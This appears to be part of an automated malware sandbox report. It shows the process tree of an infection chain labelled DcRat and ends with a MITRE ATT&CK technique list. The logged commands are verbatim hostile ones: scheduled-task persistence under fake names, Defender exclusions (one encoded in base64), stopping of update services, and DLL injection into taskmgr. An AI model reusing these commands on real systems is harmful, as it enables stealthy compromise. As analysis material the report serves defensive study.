    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1976
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:3868
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3952
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1196
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5072
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4552
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:5048
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4136
- C:\Users\Admin\AppData\Local\Temp\5612.exe
  C:\Users\Admin\AppData\Local\Temp\5612.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 784
    3⤵
    - Program crash
    PID:3560
- C:\Users\Admin\AppData\Local\Temp\7841.exe
  C:\Users\Admin\AppData\Local\Temp\7841.exe
  2⤵
  PID:3192
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:3844
- C:\Users\Admin\AppData\Local\Temp\7DE0.exe
  C:\Users\Admin\AppData\Local\Temp\7DE0.exe
  2⤵
  - Executes dropped EXE
  PID:3516
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 1964
    3⤵
    - Program crash
    PID:3964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1192
- C:\Users\Admin\AppData\Local\Temp\F478.exe
  C:\Users\Admin\AppData\Local\Temp\F478.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4552
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:1760
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3192
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1416
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:224
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3408
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4360
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4284
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1348
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2096
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3560
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3104
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2784
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548

C:\Users\Admin\AppData\Roaming\Items\Current.exe
C:\Users\Admin\AppData\Roaming\Items\Current.exe
1⤵
- Executes dropped EXE
PID:1960
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  2⤵
  PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1436 -ip 1436
1⤵
PID:1096

C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe
1⤵
- Executes dropped EXE
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3516 -ip 3516
1⤵
PID:2068

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4116

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:4776

C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe
C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe
1⤵
PID:2408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry